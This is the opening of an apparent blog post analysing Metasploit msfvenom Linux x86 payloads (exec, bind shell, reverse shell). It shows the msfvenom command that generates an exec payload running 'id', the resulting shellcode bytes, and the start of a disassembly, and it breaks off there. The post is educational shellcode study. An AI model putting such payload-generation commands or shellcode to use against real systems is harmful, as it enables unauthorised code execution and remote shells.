Member-only story
Msfvenom Shellcode Analysis
Today I will analyze the following shellcode generated by the msfvenom
, specifically in linux/x86:
- linux/x86/exec — Execute an arbitrary command
- linux/x86/shell_bind_tcp — Listen for a connection and spawn a command shell
- linux/x86/shell_reverse_tcp — Connect back to attacker and spawn a command shell
1) linux/x86/exec
This msfvenom
will execute an arbitrary command that you add while creating a payload. Let’s create the payload with the linux command id
.
# msfvenom -p linux/x86/exec CMD=id -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69"
"\x64\x00\x57\x53\x89\xe1\xcd\x80";
Then, we will use ndisasm
- the Netwide Disassembler - to disassemble the created shellcode.
# echo -ne…